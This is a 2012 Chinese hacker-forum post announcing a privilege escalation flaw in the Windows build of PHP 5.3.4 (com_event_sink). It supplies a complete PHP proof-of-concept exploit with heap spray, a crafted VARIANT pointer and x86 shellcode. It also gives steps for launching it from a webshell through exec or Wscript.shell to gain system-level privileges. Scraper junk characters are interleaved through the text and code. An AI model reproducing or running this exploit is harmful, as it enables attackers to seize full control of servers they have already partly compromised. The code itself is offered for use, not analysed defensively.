找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2165|回复: 0
打印 上一主题 下一主题

PHP 5.3.4(WIN) COM_SINK权限提升漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:08:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
6 U' n% V" p# u6 C, }. N
' x2 I* m: }* k9 ^# ~5 Q& F测试方法如下:cmd /c x:\php\php.exe x:\test.php
6 N! o6 a  W9 _, X& g8 z& f% c3 W7 b+ v! f
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php+ {3 \- u) s% [3 U7 f
这里是两个测试的截图:/ w1 T$ d3 q2 D" y& Q
' N3 L, T$ j3 R' \1 c! M
: G( c/ q/ Q: \8 j% X
! G5 O% a4 d* T/ S: h' \

! \$ w* j" P. R% _  d3 L( `  j' F. I0 f' @3 {
成功利用此漏洞的攻击者将获得系统的最高权限
; q  X$ k& v3 s" X! M' d
# H+ @: V( H3 p7 t4 B* F
, W/ I" ^( }5 N, K- p0 {; \- O7 `. N* s# p  V7 c0 y1 x6 |4 h9 m+ e" c) J

! o. A# u4 U2 w9 ~2 W; f: X8 s, N& d+ n" e
关于漏洞分析稍后附上。一下是PoC代码:2 j" A, g* v6 n& O$ @0 F7 j

! a6 H9 ]# l7 w) h+ X& _3 g, I* a<?php
  |' D7 c$ u/ U: _& _# Z0 R//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
: L/ v. Y# o- {# ?//$eip ="\x44\x43\x42\x41";0 s, {( ]" U9 l1 G
$eip= "\x4b\xe8\x57\x78";1 y( P: `9 g1 R/ ~7 d  ?
$eax ="\x80\x01\x8d\x04";
' {( A# a  z. R, n7 a2 D9 V$deodrant="";7 }# C, x. }3 j# _0 E; C  f
$axespray = str_repeat($eip.$eax,0x80);3 E/ a0 d$ }5 q' }7 c/ l  Z. D$ Y6 i
//048d0190
  m( D* o+ l. _& J$ i& ~echo strlen($axespray);, v2 k+ S$ Y3 {( q( G
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
, V+ g# P" i: E( gecho "Silic Group Hacker Army - BlackBap.Org";3 r% {2 x  O) T- f& K1 j
//19200 ==4B32 4b002 m" f$ p6 m+ d$ K- f  K
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
9 L3 k+ j9 b; {! N' t8 o$terminate = "T";
7 u* t2 D# ?! z5 `  b6 h$ F+ T$u[] =$deodrant;/ R* ~' m4 D! o1 ^. K, }8 t0 s
$r[] =$deodrant.$terminate;
4 s' }% k6 h, `) h* I$a[] =$deodrant.$terminate;
: G% m( k( ^4 O  ]* _) \$s[] =$deodrant.$terminate;
8 ^! J8 r0 Y: u! B7 w//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的
$ M/ A% O& w9 Y$ J5 z' W; J1 Q" B* h$vVar = new VARIANT(0x048d0000+180);
. r5 x. @0 n: u* m  N5 X( A  v//弹窗代码(Shellcode)
' {6 u* V6 }: m0 m4 L1 u$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
2 \4 }. d) u+ B8 j+ M+ j$var2 = new VARIANT(0x41414242);/ r" J5 Y8 O+ H- I$ k) ^
com_event_sink($vVar,$var2,$buffer);
2 ?* J- q! {7 C7 ~' p?>' }7 x, l7 k/ D( M. s6 `7 Q

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表